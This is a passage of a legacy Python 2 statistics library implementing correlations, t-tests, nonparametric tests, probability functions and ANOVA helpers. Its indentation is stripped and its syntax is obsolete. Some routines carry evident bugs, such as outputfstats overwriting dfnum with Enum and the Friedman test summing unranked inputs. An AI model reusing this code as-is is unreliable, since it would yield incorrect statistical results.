r_den = math.sqrt((n*ass(x) - asquare_of_sums(x))*(n*ass(y)-asquare_of_sums(y)))
r = (r_num / r_den)
df = n-2
t = r*math.sqrt(df/((1.0-r+TINY)*(1.0+r+TINY)))
prob = abetai(0.5*df,0.5,df/(df+t*t),verbose)
return r,prob
def aspearmanr(x,y):
"""
Calculates a Spearman rank-order correlation coefficient. Taken
from Heiman's Basic Statistics for the Behav. Sci (1st), p.192.
Usage: aspearmanr(x,y) where x,y are equal-length arrays
Returns: Spearman's r, two-tailed p-value
"""
TINY = 1e-30
n = len(x)
rankx = rankdata(x)
ranky = rankdata(y)
dsq = N.add.reduce((rankx-ranky)**2)
rs = 1 - 6*dsq / float(n*(n**2-1))
t = rs * math.sqrt((n-2) / ((rs+1.0)*(1.0-rs)))
df = n-2
probrs = abetai(0.5*df,0.5,df/(df+t*t))
# probability values for rs are from part 2 of the spearman function in
# Numerical Recipies, p.510. They close to tables, but not exact.(?)
return rs, probrs
def apointbiserialr(x,y):
"""
Calculates a point-biserial correlation coefficient and the associated
probability value. Taken from Heiman's Basic Statistics for the Behav.
Sci (1st), p.194.
Usage: apointbiserialr(x,y) where x,y are equal length arrays
Returns: Point-biserial r, two-tailed p-value
"""
TINY = 1e-30
categories = pstat.aunique(x)
data = pstat.aabut(x,y)
if len(categories) <> 2:
raise ValueError, "Exactly 2 categories required (in x) for pointbiserialr()."
else: # there are 2 categories, continue
codemap = pstat.aabut(categories,N.arange(2))
recoded = pstat.arecode(data,codemap,0)
x = pstat.alinexand(data,0,categories[0])
y = pstat.alinexand(data,0,categories[1])
xmean = amean(pstat.acolex(x,1))
ymean = amean(pstat.acolex(y,1))
n = len(data)
adjust = math.sqrt((len(x)/float(n))*(len(y)/float(n)))
rpb = (ymean - xmean)/asamplestdev(pstat.acolex(data,1))*adjust
df = n-2
t = rpb*math.sqrt(df/((1.0-rpb+TINY)*(1.0+rpb+TINY)))
prob = abetai(0.5*df,0.5,df/(df+t*t))
return rpb, prob
def akendalltau(x,y):
"""
Calculates Kendall's tau ... correlation of ordinal data. Adapted
from function kendl1 in Numerical Recipies. Needs good test-cases.@@@
Usage: akendalltau(x,y)
Returns: Kendall's tau, two-tailed p-value
"""
n1 = 0
n2 = 0
iss = 0
for j in range(len(x)-1):
for k in range(j,len(y)):
a1 = x[j] - x[k]
a2 = y[j] - y[k]
aa = a1 * a2
if (aa): # neither array has a tie
n1 = n1 + 1
n2 = n2 + 1
if aa > 0:
iss = iss + 1
else:
iss = iss -1
else:
if (a1):
n1 = n1 + 1
else:
n2 = n2 + 1
tau = iss / math.sqrt(n1*n2)
svar = (4.0*len(x)+10.0) / (9.0*len(x)*(len(x)-1))
z = tau / math.sqrt(svar)
prob = erfcc(abs(z)/1.4142136)
return tau, prob
def alinregress(*args):
"""
Calculates a regression line on two arrays, x and y, corresponding to x,y
pairs. If a single 2D array is passed, alinregress finds dim with 2 levels
and splits data into x,y pairs along that dim.
Usage: alinregress(*args) args=2 equal-length arrays, or one 2D array
Returns: slope, intercept, r, two-tailed prob, sterr-of-the-estimate
"""
TINY = 1.0e-20
if len(args) == 1: # more than 1D array?
args = args[0]
if len(args) == 2:
x = args[0]
y = args[1]
else:
x = args[:,0]
y = args[:,1]
else:
x = args[0]
y = args[1]
n = len(x)
xmean = amean(x)
ymean = amean(y)
r_num = n*(N.add.reduce(x*y)) - N.add.reduce(x)*N.add.reduce(y)
r_den = math.sqrt((n*ass(x) - asquare_of_sums(x))*(n*ass(y)-asquare_of_sums(y)))
r = r_num / r_den
z = 0.5*math.log((1.0+r+TINY)/(1.0-r+TINY))
df = n-2
t = r*math.sqrt(df/((1.0-r+TINY)*(1.0+r+TINY)))
prob = abetai(0.5*df,0.5,df/(df+t*t))
slope = r_num / (float(n)*ass(x) - asquare_of_sums(x))
intercept = ymean - slope*xmean
sterrest = math.sqrt(1-r*r)*asamplestdev(y)
return slope, intercept, r, prob, sterrest
#####################################
##### AINFERENTIAL STATISTICS #####
#####################################
def attest_1samp(a,popmean,printit=0,name='Sample',writemode='a'):
"""
Calculates the t-obtained for the independent samples T-test on ONE group
of scores a, given a population mean. If printit=1, results are printed
to the screen. If printit='filename', the results are output to 'filename'
using the given writemode (default=append). Returns t-value, and prob.
Usage: attest_1samp(a,popmean,Name='Sample',printit=0,writemode='a')
Returns: t-value, two-tailed prob
"""
if type(a) != N.ArrayType:
a = N.array(a)
x = amean(a)
v = avar(a)
n = len(a)
df = n-1
svar = ((n-1)*v) / float(df)
t = (x-popmean)/math.sqrt(svar*(1.0/n))
prob = abetai(0.5*df,0.5,df/(df+t*t))
if printit <> 0:
statname = 'Single-sample T-test.'
outputpairedstats(printit,writemode,
'Population','--',popmean,0,0,0,
name,n,x,v,N.minimum.reduce(N.ravel(a)),
N.maximum.reduce(N.ravel(a)),
statname,t,prob)
return t,prob
def attest_ind (a, b, dimension=None, printit=0, name1='Samp1', name2='Samp2',writemode='a'):
"""
Calculates the t-obtained T-test on TWO INDEPENDENT samples of scores
a, and b. From Numerical Recipies, p.483. If printit=1, results are
printed to the screen. If printit='filename', the results are output
to 'filename' using the given writemode (default=append). Dimension
can equal None (ravel array first), or an integer (the dimension over
which to operate on a and b).
Usage: attest_ind (a,b,dimension=None,printit=0,
Name1='Samp1',Name2='Samp2',writemode='a')
Returns: t-value, two-tailed p-value
"""
if dimension == None:
a = N.ravel(a)
b = N.ravel(b)
dimension = 0
x1 = amean(a,dimension)
x2 = amean(b,dimension)
v1 = avar(a,dimension)
v2 = avar(b,dimension)
n1 = a.shape[dimension]
n2 = b.shape[dimension]
df = n1+n2-2
svar = ((n1-1)*v1+(n2-1)*v2) / float(df)
zerodivproblem = N.equal(svar,0)
svar = N.where(zerodivproblem,1,svar) # avoid zero-division in 1st place
t = (x1-x2)/N.sqrt(svar*(1.0/n1 + 1.0/n2)) # N-D COMPUTATION HERE!!!!!!
t = N.where(zerodivproblem,1.0,t) # replace NaN/wrong t-values with 1.0
probs = abetai(0.5*df,0.5,float(df)/(df+t*t))
if type(t) == N.ArrayType:
probs = N.reshape(probs,t.shape)
if len(probs) == 1:
probs = probs[0]
if printit <> 0:
if type(t) == N.ArrayType:
t = t[0]
if type(probs) == N.ArrayType:
probs = probs[0]
statname = 'Independent samples T-test.'
outputpairedstats(printit,writemode,
name1,n1,x1,v1,N.minimum.reduce(N.ravel(a)),
N.maximum.reduce(N.ravel(a)),
name2,n2,x2,v2,N.minimum.reduce(N.ravel(b)),
N.maximum.reduce(N.ravel(b)),
statname,t,probs)
return
return t, probs
def attest_rel (a,b,dimension=None,printit=0,name1='Samp1',name2='Samp2',writemode='a'):
"""
Calculates the t-obtained T-test on TWO RELATED samples of scores, a
and b. From Numerical Recipies, p.483. If printit=1, results are
printed to the screen. If printit='filename', the results are output
to 'filename' using the given writemode (default=append). Dimension
can equal None (ravel array first), or an integer (the dimension over
which to operate on a and b).
Usage: attest_rel(a,b,dimension=None,printit=0,
name1='Samp1',name2='Samp2',writemode='a')
Returns: t-value, two-tailed p-value
"""
if dimension == None:
a = N.ravel(a)
b = N.ravel(b)
dimension = 0
if len(a)<>len(b):
raise ValueError, 'Unequal length arrays.'
x1 = amean(a,dimension)
x2 = amean(b,dimension)
v1 = avar(a,dimension)
v2 = avar(b,dimension)
n = a.shape[dimension]
df = float(n-1)
d = (a-b).astype('d')
denom = N.sqrt((n*N.add.reduce(d*d,dimension) - N.add.reduce(d,dimension)**2) /df)
zerodivproblem = N.equal(denom,0)
denom = N.where(zerodivproblem,1,denom) # avoid zero-division in 1st place
t = N.add.reduce(d,dimension) / denom # N-D COMPUTATION HERE!!!!!!
t = N.where(zerodivproblem,1.0,t) # replace NaN/wrong t-values with 1.0
probs = abetai(0.5*df,0.5,float(df)/(df+t*t))
if type(t) == N.ArrayType:
probs = N.reshape(probs,t.shape)
if len(probs) == 1:
probs = probs[0]
if printit <> 0:
statname = 'Related samples T-test.'
outputpairedstats(printit,writemode,
name1,n,x1,v1,N.minimum.reduce(N.ravel(a)),
N.maximum.reduce(N.ravel(a)),
name2,n,x2,v2,N.minimum.reduce(N.ravel(b)),
N.maximum.reduce(N.ravel(b)),
statname,t,probs)
return
return t, probs
def achisquare(f_obs,f_exp=None):
"""
Calculates a one-way chi square for array of observed frequencies and returns
the result. If no expected frequencies are given, the total N is assumed to
be equally distributed across all groups.
Usage: achisquare(f_obs, f_exp=None) f_obs = array of observed cell freq.
Returns: chisquare-statistic, associated p-value
"""
k = len(f_obs)
if f_exp == None:
f_exp = N.array([sum(f_obs)/float(k)] * len(f_obs),N.Float)
f_exp = f_exp.astype(N.Float)
chisq = N.add.reduce((f_obs-f_exp)**2 / f_exp)
return chisq, chisqprob(chisq, k-1)
def aks_2samp (data1,data2):
"""
Computes the Kolmogorov-Smirnof statistic on 2 samples. Modified from
Numerical Recipies in C, page 493. Returns KS D-value, prob. Not ufunc-
like.
Usage: aks_2samp(data1,data2) where data1 and data2 are 1D arrays
Returns: KS D-value, p-value
"""
j1 = 0 # N.zeros(data1.shape[1:]) TRIED TO MAKE THIS UFUNC-LIKE
j2 = 0 # N.zeros(data2.shape[1:])
fn1 = 0.0 # N.zeros(data1.shape[1:],N.Float)
fn2 = 0.0 # N.zeros(data2.shape[1:],N.Float)
n1 = data1.shape[0]
n2 = data2.shape[0]
en1 = n1*1
en2 = n2*1
d = N.zeros(data1.shape[1:],N.Float)
data1 = N.sort(data1,0)
data2 = N.sort(data2,0)
while j1 < n1 and j2 < n2:
d1=data1[j1]
d2=data2[j2]
if d1 <= d2:
fn1 = (j1)/float(en1)
j1 = j1 + 1
if d2 <= d1:
fn2 = (j2)/float(en2)
j2 = j2 + 1
dt = (fn2-fn1)
if abs(dt) > abs(d):
d = dt
try:
en = math.sqrt(en1*en2/float(en1+en2))
prob = aksprob((en+0.12+0.11/en)*N.fabs(d))
except:
prob = 1.0
return d, prob
def amannwhitneyu(x,y):
"""
Calculates a Mann-Whitney U statistic on the provided scores and
returns the result. Use only when the n in each condition is < 20 and
you have 2 independent samples of ranks. REMEMBER: Mann-Whitney U is
significant if the u-obtained is LESS THAN or equal to the critical
value of U.
Usage: amannwhitneyu(x,y) where x,y are arrays of values for 2 conditions
Returns: u-statistic, one-tailed p-value (i.e., p(z(U)))
"""
n1 = len(x)
n2 = len(y)
ranked = rankdata(N.concatenate((x,y)))
rankx = ranked[0:n1] # get the x-ranks
ranky = ranked[n1:] # the rest are y-ranks
u1 = n1*n2 + (n1*(n1+1))/2.0 - sum(rankx) # calc U for x
u2 = n1*n2 - u1 # remainder is U for y
bigu = max(u1,u2)
smallu = min(u1,u2)
T = math.sqrt(tiecorrect(ranked)) # correction factor for tied scores
if T == 0:
raise ValueError, 'All numbers are identical in amannwhitneyu'
sd = math.sqrt(T*n1*n2*(n1+n2+1)/12.0)
z = abs((bigu-n1*n2/2.0) / sd) # normal approximation for prob calc
return smallu, 1.0 - zprob(z)
def atiecorrect(rankvals):
"""
Tie-corrector for ties in Mann Whitney U and Kruskal Wallis H tests.
See Siegel, S. (1956) Nonparametric Statistics for the Behavioral
Sciences. New York: McGraw-Hill. Code adapted from |Stat rankind.c
code.
Usage: atiecorrect(rankvals)
Returns: T correction factor for U or H
"""
sorted,posn = ashellsort(N.array(rankvals))
n = len(sorted)
T = 0.0
i = 0
while (i<n-1):
if sorted[i] == sorted[i+1]:
nties = 1
while (i<n-1) and (sorted[i] == sorted[i+1]):
nties = nties +1
i = i +1
T = T + nties**3 - nties
i = i+1
T = T / float(n**3-n)
return 1.0 - T
def aranksums(x,y):
"""
Calculates the rank sums statistic on the provided scores and returns
the result.
Usage: aranksums(x,y) where x,y are arrays of values for 2 conditions
Returns: z-statistic, two-tailed p-value
"""
n1 = len(x)
n2 = len(y)
alldata = N.concatenate((x,y))
ranked = arankdata(alldata)
x = ranked[:n1]
y = ranked[n1:]
s = sum(x)
expected = n1*(n1+n2+1) / 2.0
z = (s - expected) / math.sqrt(n1*n2*(n1+n2+1)/12.0)
prob = 2*(1.0 -zprob(abs(z)))
return z, prob
def awilcoxont(x,y):
"""
Calculates the Wilcoxon T-test for related samples and returns the
result. A non-parametric T-test.
Usage: awilcoxont(x,y) where x,y are equal-length arrays for 2 conditions
Returns: t-statistic, two-tailed p-value
"""
if len(x) <> len(y):
raise ValueError, 'Unequal N in awilcoxont. Aborting.'
d = x-y
d = N.compress(N.not_equal(d,0),d) # Keep all non-zero differences
count = len(d)
absd = abs(d)
absranked = arankdata(absd)
r_plus = 0.0
r_minus = 0.0
for i in range(len(absd)):
if d[i] < 0:
r_minus = r_minus + absranked[i]
else:
r_plus = r_plus + absranked[i]
wt = min(r_plus, r_minus)
mn = count * (count+1) * 0.25
se = math.sqrt(count*(count+1)*(2.0*count+1.0)/24.0)
z = math.fabs(wt-mn) / se
z = math.fabs(wt-mn) / se
prob = 2*(1.0 -zprob(abs(z)))
return wt, prob
def akruskalwallish(*args):
"""
The Kruskal-Wallis H-test is a non-parametric ANOVA for 3 or more
groups, requiring at least 5 subjects in each group. This function
calculates the Kruskal-Wallis H and associated p-value for 3 or more
independent samples.
Usage: akruskalwallish(*args) args are separate arrays for 3+ conditions
Returns: H-statistic (corrected for ties), associated p-value
"""
assert len(args) == 3, "Need at least 3 groups in stats.akruskalwallish()"
args = list(args)
n = [0]*len(args)
n = map(len,args)
all = []
for i in range(len(args)):
all = all + args[i].tolist()
ranked = rankdata(all)
T = tiecorrect(ranked)
for i in range(len(args)):
args[i] = ranked[0:n[i]]
del ranked[0:n[i]]
rsums = []
for i in range(len(args)):
rsums.append(sum(args[i])**2)
rsums[i] = rsums[i] / float(n[i])
ssbn = sum(rsums)
totaln = sum(n)
h = 12.0 / (totaln*(totaln+1)) * ssbn - 3*(totaln+1)
df = len(args) - 1
if T == 0:
raise ValueError, 'All numbers are identical in akruskalwallish'
h = h / float(T)
return h, chisqprob(h,df)
def afriedmanchisquare(*args):
"""
Friedman Chi-Square is a non-parametric, one-way within-subjects
ANOVA. This function calculates the Friedman Chi-square test for
repeated measures and returns the result, along with the associated
probability value. It assumes 3 or more repeated measures. Only 3
levels requires a minimum of 10 subjects in the study. Four levels
requires 5 subjects per level(??).
Usage: afriedmanchisquare(*args) args are separate arrays for 2+ conditions
Returns: chi-square statistic, associated p-value
"""
k = len(args)
if k < 3:
raise ValueError, '\nLess than 3 levels. Friedman test not appropriate.\n'
n = len(args[0])
data = apply(pstat.aabut,args)
data = data.astype(N.Float)
for i in range(len(data)):
data[i] = arankdata(data[i])
ssbn = asum(asum(args,1)**2)
chisq = 12.0 / (k*n*(k+1)) * ssbn - 3*n*(k+1)
return chisq, chisqprob(chisq,k-1)
#####################################
#### APROBABILITY CALCULATIONS ####
#####################################
def achisqprob(chisq,df):
"""
Returns the (1-tail) probability value associated with the provided chi-square
value and df. Heavily modified from chisq.c in Gary Perlman's |Stat. Can
handle multiple dimensions.
Usage: achisqprob(chisq,df) chisq=chisquare stat., df=degrees of freedom
"""
BIG = 200.0
def ex(x):
BIG = 200.0
exponents = N.where(N.less(x,-BIG),-BIG,x)
return N.exp(exponents)
if type(chisq) == N.ArrayType:
arrayflag = 1
else:
arrayflag = 0
chisq = N.array([chisq])
if df < 1:
return N.ones(chisq.shape,N.float)
probs = N.zeros(chisq.shape,N.Float)
probs = N.where(N.less_equal(chisq,0),1.0,probs) # set prob=1 for chisq<0
a = 0.5 * chisq
if df > 1:
y = ex(-a)
if df%2 == 0:
even = 1
s = y*1
s2 = s*1
else:
even = 0
s = 2.0 * azprob(-N.sqrt(chisq))
s2 = s*1
if (df > 2):
chisq = 0.5 * (df - 1.0)
if even:
z = N.ones(probs.shape,N.Float)
else:
z = 0.5 *N.ones(probs.shape,N.Float)
if even:
e = N.zeros(probs.shape,N.Float)
else:
e = N.log(N.sqrt(N.pi)) *N.ones(probs.shape,N.Float)
c = N.log(a)
mask = N.zeros(probs.shape)
a_big = N.greater(a,BIG)
a_big_frozen = -1 *N.ones(probs.shape,N.Float)
totalelements = N.multiply.reduce(N.array(probs.shape))
while asum(mask)<>totalelements:
e = N.log(z) + e
s = s + ex(c*z-a-e)
z = z + 1.0
# print z, e, s
newmask = N.greater(z,chisq)
a_big_frozen = N.where(newmask*N.equal(mask,0)*a_big, s, a_big_frozen)
mask = N.clip(newmask+mask,0,1)
if even:
z = N.ones(probs.shape,N.Float)
e = N.ones(probs.shape,N.Float)
else:
z = 0.5 *N.ones(probs.shape,N.Float)
e = 1.0 / N.sqrt(N.pi) / N.sqrt(a) * N.ones(probs.shape,N.Float)
c = 0.0
mask = N.zeros(probs.shape)
a_notbig_frozen = -1 *N.ones(probs.shape,N.Float)
while asum(mask)<>totalelements:
e = e * (a/z.astype(N.Float))
c = c + e
z = z + 1.0
# print '#2', z, e, c, s, c*y+s2
newmask = N.greater(z,chisq)
a_notbig_frozen = N.where(newmask*N.equal(mask,0)*(1-a_big),
c*y+s2, a_notbig_frozen)
mask = N.clip(newmask+mask,0,1)
probs = N.where(N.equal(probs,1),1,
N.where(N.greater(a,BIG),a_big_frozen,a_notbig_frozen))
return probs
else:
return s
def aerfcc(x):
"""
Returns the complementary error function erfc(x) with fractional error
everywhere less than 1.2e-7. Adapted from Numerical Recipies. Can
handle multiple dimensions.
Usage: aerfcc(x)
"""
z = abs(x)
t = 1.0 / (1.0+0.5*z)
ans = t * N.exp(-z*z-1.26551223 + t*(1.00002368+t*(0.37409196+t*(0.09678418+t*(-0.18628806+t*(0.27886807+t*(-1.13520398+t*(1.48851587+t*(-0.82215223+t*0.17087277)))))))))
return N.where(N.greater_equal(x,0), ans, 2.0-ans)
def azprob(z):
"""
Returns the area under the normal curve 'to the left of' the given z value.
Thus,
for z<0, zprob(z) = 1-tail probability
for z>0, 1.0-zprob(z) = 1-tail probability
for any z, 2.0*(1.0-zprob(abs(z))) = 2-tail probability
Adapted from z.c in Gary Perlman's |Stat. Can handle multiple dimensions.
Usage: azprob(z) where z is a z-value
"""
def yfunc(y):
x = (((((((((((((-0.000045255659 * y
+0.000152529290) * y -0.000019538132) * y
-0.000676904986) * y +0.001390604284) * y
-0.000794620820) * y -0.002034254874) * y
+0.006549791214) * y -0.010557625006) * y
+0.011630447319) * y -0.009279453341) * y
+0.005353579108) * y -0.002141268741) * y
+0.000535310849) * y +0.999936657524
return x
def wfunc(w):
x = ((((((((0.000124818987 * w
-0.001075204047) * w +0.005198775019) * w
-0.019198292004) * w +0.059054035642) * w
-0.151968751364) * w +0.319152932694) * w
-0.531923007300) * w +0.797884560593) * N.sqrt(w) * 2.0
return x
Z_MAX = 6.0 # maximum meaningful z-value
x = N.zeros(z.shape,N.Float) # initialize
y = 0.5 * N.fabs(z)
x = N.where(N.less(y,1.0),wfunc(y*y),yfunc(y-2.0)) # get x's
x = N.where(N.greater(y,Z_MAX*0.5),1.0,x) # kill those with big Z
prob = N.where(N.greater(z,0),(x+1)*0.5,(1-x)*0.5)
return prob
def aksprob(alam):
"""
Returns the probability value for a K-S statistic computed via ks_2samp.
Adapted from Numerical Recipies. Can handle multiple dimensions.
Usage: aksprob(alam)
"""
if type(alam) == N.ArrayType:
frozen = -1 *N.ones(alam.shape,N.Float64)
alam = alam.astype(N.Float64)
arrayflag = 1
else:
frozen = N.array(-1.)
alam = N.array(alam,N.Float64)
mask = N.zeros(alam.shape)
fac = 2.0 *N.ones(alam.shape,N.Float)
sum = N.zeros(alam.shape,N.Float)
termbf = N.zeros(alam.shape,N.Float)
a2 = N.array(-2.0*alam*alam,N.Float64)
totalelements = N.multiply.reduce(N.array(mask.shape))
for j in range(1,201):
if asum(mask) == totalelements:
break
exponents = (a2*j*j)
overflowmask = N.less(exponents,-746)
frozen = N.where(overflowmask,0,frozen)
mask = mask+overflowmask
term = fac*N.exp(exponents)
sum = sum + term
newmask = N.where(N.less_equal(abs(term),(0.001*termbf)) +
N.less(abs(term),1.0e-8*sum), 1, 0)
frozen = N.where(newmask*N.equal(mask,0), sum, frozen)
mask = N.clip(mask+newmask,0,1)
fac = -fac
termbf = abs(term)
if arrayflag:
return N.where(N.equal(frozen,-1), 1.0, frozen) # 1.0 if doesn't converge
else:
return N.where(N.equal(frozen,-1), 1.0, frozen)[0] # 1.0 if doesn't converge
def afprob (dfnum, dfden, F):
"""
Returns the 1-tailed significance level (p-value) of an F statistic
given the degrees of freedom for the numerator (dfR-dfF) and the degrees
of freedom for the denominator (dfF). Can handle multiple dims for F.
Usage: afprob(dfnum, dfden, F) where usually dfnum=dfbn, dfden=dfwn
"""
if type(F) == N.ArrayType:
return abetai(0.5*dfden, 0.5*dfnum, dfden/(1.0*dfden+dfnum*F))
else:
return abetai(0.5*dfden, 0.5*dfnum, dfden/float(dfden+dfnum*F))
def abetacf(a,b,x,verbose=1):
"""
Evaluates the continued fraction form of the incomplete Beta function,
betai. (Adapted from: Numerical Recipies in C.) Can handle multiple
dimensions for x.
Usage: abetacf(a,b,x,verbose=1)
"""
ITMAX = 200
EPS = 3.0e-7
arrayflag = 1
if type(x) == N.ArrayType:
frozen = N.ones(x.shape,N.Float) *-1 #start out w/ -1s, should replace all
else:
arrayflag = 0
frozen = N.array([-1])
x = N.array([x])
mask = N.zeros(x.shape)
bm = az = am = 1.0
qab = a+b
qap = a+1.0
qam = a-1.0
bz = 1.0-qab*x/qap
for i in range(ITMAX+1):
if N.sum(N.ravel(N.equal(frozen,-1)))==0:
break
em = float(i+1)
tem = em + em
d = em*(b-em)*x/((qam+tem)*(a+tem))
ap = az + d*am
bp = bz+d*bm
d = -(a+em)*(qab+em)*x/((qap+tem)*(a+tem))
app = ap+d*az
bpp = bp+d*bz
aold = az*1
am = ap/bpp
bm = bp/bpp
az = app/bpp
bz = 1.0
newmask = N.less(abs(az-aold),EPS*abs(az))
frozen = N.where(newmask*N.equal(mask,0), az, frozen)
mask = N.clip(mask+newmask,0,1)
noconverge = asum(N.equal(frozen,-1))
if noconverge <> 0 and verbose:
print 'a or b too big, or ITMAX too small in Betacf for ',noconverge,' elements'
if arrayflag:
return frozen
else:
return frozen[0]
def agammln(xx):
"""
Returns the gamma function of xx.
Gamma(z) = Integral(0,infinity) of t^(z-1)exp(-t) dt.
Adapted from: Numerical Recipies in C. Can handle multiple dims ... but
probably doesn't normally have to.
Usage: agammln(xx)
"""
coeff = [76.18009173, -86.50532033, 24.01409822, -1.231739516,
0.120858003e-2, -0.536382e-5]
x = xx - 1.0
tmp = x + 5.5
tmp = tmp - (x+0.5)*N.log(tmp)
ser = 1.0
for j in range(len(coeff)):
x = x + 1
ser = ser + coeff[j]/x
return -tmp + N.log(2.50662827465*ser)
def abetai(a,b,x,verbose=1):
"""
Returns the incomplete beta function:
I-sub-x(a,b) = 1/B(a,b)*(Integral(0,x) of t^(a-1)(1-t)^(b-1) dt)
where a,b>0 and B(a,b) = G(a)*G(b)/(G(a+b)) where G(a) is the gamma
function of a. The continued fraction formulation is implemented
here, using the betacf function. (Adapted from: Numerical Recipies in
C.) Can handle multiple dimensions.
Usage: abetai(a,b,x,verbose=1)
"""
TINY = 1e-15
if type(a) == N.ArrayType:
if asum(N.less(x,0)+N.greater(x,1)) <> 0:
raise ValueError, 'Bad x in abetai'
x = N.where(N.equal(x,0),TINY,x)
x = N.where(N.equal(x,1.0),1-TINY,x)
bt = N.where(N.equal(x,0)+N.equal(x,1), 0, -1)
exponents = ( gammln(a+b)-gammln(a)-gammln(b)+a*N.log(x)+b*
N.log(1.0-x) )
# 746 (below) is the MAX POSSIBLE BEFORE OVERFLOW
exponents = N.where(N.less(exponents,-740),-740,exponents)
bt = N.exp(exponents)
if type(x) == N.ArrayType:
ans = N.where(N.less(x,(a+1)/(a+b+2.0)),
bt*abetacf(a,b,x,verbose)/float(a),
1.0-bt*abetacf(b,a,1.0-x,verbose)/float(b))
else:
if x<(a+1)/(a+b+2.0):
ans = bt*abetacf(a,b,x,verbose)/float(a)
else:
ans = 1.0-bt*abetacf(b,a,1.0-x,verbose)/float(b)
return ans
#####################################
####### AANOVA CALCULATIONS #######
#####################################
import LinearAlgebra, operator
LA = LinearAlgebra
def aglm(data,para):
"""
Calculates a linear model fit ... anova/ancova/lin-regress/t-test/etc. Taken
from:
Peterson et al. Statistical limitations in functional neuroimaging
I. Non-inferential methods and statistical models. Phil Trans Royal Soc
Lond B 354: 1239-1260.
Usage: aglm(data,para)
Returns: statistic, p-value ???
"""
if len(para) <> len(data):
print "data and para must be same length in aglm"
return
n = len(para)
p = pstat.aunique(para)
x = N.zeros((n,len(p))) # design matrix
for l in range(len(p)):
x[:,l] = N.equal(para,p[l])
b = N.dot(N.dot(LA.inverse(N.dot(N.transpose(x),x)), # i.e., b=inv(X'X)X'Y
N.transpose(x)),
data)
diffs = (data - N.dot(x,b))
s_sq = 1./(n-len(p)) * N.dot(N.transpose(diffs), diffs)
if len(p) == 2: # ttest_ind
c = N.array([1,-1])
df = n-2
fact = asum(1.0/asum(x,0)) # i.e., 1/n1 + 1/n2 + 1/n3 ...
t = N.dot(c,b) / N.sqrt(s_sq*fact)
probs = abetai(0.5*df,0.5,float(df)/(df+t*t))
return t, probs
def aF_oneway(*args):
"""
Performs a 1-way ANOVA, returning an F-value and probability given
any number of groups. From Heiman, pp.394-7.
Usage: aF_oneway (*args) where *args is 2 or more arrays, one per
treatment group
Returns: f-value, probability
"""
na = len(args) # ANOVA on 'na' groups, each in it's own array
means = [0]*na
vars = [0]*na
ns = [0]*na
alldata = []
tmp = map(N.array,args)
means = map(amean,tmp)
vars = map(avar,tmp)
ns = map(len,args)
alldata = N.concatenate(args)
bign = len(alldata)
sstot = ass(alldata)-(asquare_of_sums(alldata)/float(bign))
ssbn = 0
for a in args:
ssbn = ssbn + asquare_of_sums(N.array(a))/float(len(a))
ssbn = ssbn - (asquare_of_sums(alldata)/float(bign))
sswn = sstot-ssbn
dfbn = na-1
dfwn = bign - na
msb = ssbn/float(dfbn)
msw = sswn/float(dfwn)
f = msb/msw
prob = fprob(dfbn,dfwn,f)
return f, prob
def aF_value (ER,EF,dfR,dfF):
"""
Returns an F-statistic given the following:
ER = error associated with the null hypothesis (the Restricted model)
EF = error associated with the alternate hypothesis (the Full model)
dfR = degrees of freedom the Restricted model
dfF = degrees of freedom associated with the Restricted model
"""
return ((ER-EF)/float(dfR-dfF) / (EF/float(dfF)))
def outputfstats(Enum, Eden, dfnum, dfden, f, prob):
Enum = round(Enum,3)
Eden = round(Eden,3)
dfnum = round(Enum,3)
dfden = round(dfden,3)
f = round(f,3)
prob = round(prob,3)
suffix = '' # for *s after the p-value
if prob < 0.001: suffix = ' ***'
elif prob < 0.01: suffix = ' **'
elif prob < 0.05: suffix = ' *'
title = [['EF/ER','DF','Mean Square','F-value','prob','']]
lofl = title+[[Enum, dfnum, round(Enum/float(dfnum),3), f, prob, suffix],
[Eden, dfden, round(Eden/float(dfden),3),'','','']]
pstat.printcc(lofl)
return
def F_value_multivariate(ER, EF, dfnum, dfden):
"""
Returns an F-statistic given the following:
ER = error associated with the null hypothesis (the Restricted model)
EF = error associated with the alternate hypothesis (the Full model)
dfR = degrees of freedom the Restricted model
dfF = degrees of freedom associated with the Restricted model
where ER and EF are matrices from a multivariate F calculation.
"""
if type(ER) in [IntType, FloatType]:
ER = N.array([[ER]])
if type(EF) in [IntType, FloatType]:
EF = N.array([[EF]])
n_um = (LA.determinant(ER) - LA.determinant(EF)) / float(dfnum)
d_en = LA.determinant(EF) / float(dfden)
return n_um / d_en
#####################################
####### ASUPPORT FUNCTIONS ########
#####################################
def asign(a):
"""
Usage: asign(a)
Returns: array shape of a, with -1 where a<0 and +1 where a>=0
"""
a = N.asarray(a)
if ((type(a) == type(1.4)) or (type(a) == type(1))):
return a-a-N.less(a,0)+N.greater(a,0)
else:
return N.zeros(N.shape(a))-N.less(a,0)+N.greater(a,0)
def asum (a, dimension=None,keepdims=0):
"""
An alternative to the Numeric.add.reduce function, which allows one to
(1) collapse over multiple dimensions at once, and/or (2) to retain
all dimensions in the original array (squashing one down to size.
Dimension can equal None (ravel array first), an integer (the
dimension over which to operate), or a sequence (operate over multiple
dimensions). If keepdims=1, the resulting array will have as many
dimensions as the input array.
Usage: asum(a, dimension=None, keepdims=0)
Returns: array summed along 'dimension'(s), same _number_ of dims if keepdims=1
"""
if type(a) == N.ArrayType and a.typecode() in ['l','s','b']:
a = a.astype(N.Float)
if dimension == None:
s = N.sum(N.ravel(a))
elif type(dimension) in [IntType,FloatType]:
s = N.add.reduce(a, dimension)
if keepdims == 1:
shp = list(a.shape)
shp[dimension] = 1
s = N.reshape(s,shp)
else: # must be a SEQUENCE of dims to sum over
dims = list(dimension)
dims.sort()
dims.reverse()
s = a *1.0
for dim in dims:
s = N.add.reduce(s,dim)
if keepdims == 1:
shp = list(a.shape)
for dim in dims:
shp[dim] = 1
s = N.reshape(s,shp)
return s
def acumsum (a,dimension=None):
"""
Returns an array consisting of the cumulative sum of the items in the
passed array. Dimension can equal None (ravel array first), an
integer (the dimension over which to operate), or a sequence (operate
over multiple dimensions, but this last one just barely makes sense).
Usage: acumsum(a,dimension=None)
"""
if dimension == None:
a = N.ravel(a)
dimension = 0
if type(dimension) in [ListType, TupleType, N.ArrayType]:
dimension = list(dimension)
dimension.sort()
dimension.reverse()
for d in dimension:
a = N.add.accumulate(a,d)
return a
else:
return N.add.accumulate(a,dimension)
def ass(inarray, dimension=None, keepdims=0):
"""
Squares each value in the passed array, adds these squares & returns
the result. Unfortunate function name. :-) Defaults to ALL values in
the array. Dimension can equal None (ravel array first), an integer
(the dimension over which to operate), or a sequence (operate over
multiple dimensions). Set keepdims=1 to maintain the original number
of dimensions.
Usage: ass(inarray, dimension=None, keepdims=0)
Returns: sum-along-'dimension' for (inarray*inarray)
"""
if dimension == None:
inarray = N.ravel(inarray)
